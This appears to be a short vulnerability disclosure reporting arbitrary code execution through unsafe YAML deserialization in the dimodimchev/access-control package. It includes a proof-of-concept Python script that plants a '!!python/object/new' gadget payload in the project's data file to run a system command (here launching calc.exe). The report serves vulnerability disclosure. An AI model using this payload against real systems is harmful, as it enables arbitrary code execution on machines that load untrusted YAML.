Code Injection in dimodimchev/access-control

Valid

Reported on

Feb 19th 2021


Description

Access-Control package is vulnerable to Arbitary Code Execution due to insecure yaml desearilization.

Vulnerability

Vulnerable to YAML deserialization attack caused by unsafe loading.

Proof of Concept

steps to reproduce:

import os

os.system('git clone https://github.com/DimoDimchev/Access-Control')
os.chdir('Access-Control/')

payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"
"""

open('data/data.yaml','w+').write(payload)
os.system("python3 src/main.py")
  • python3 exploit.py

Impact

Arbitary Code Execution

to join this conversation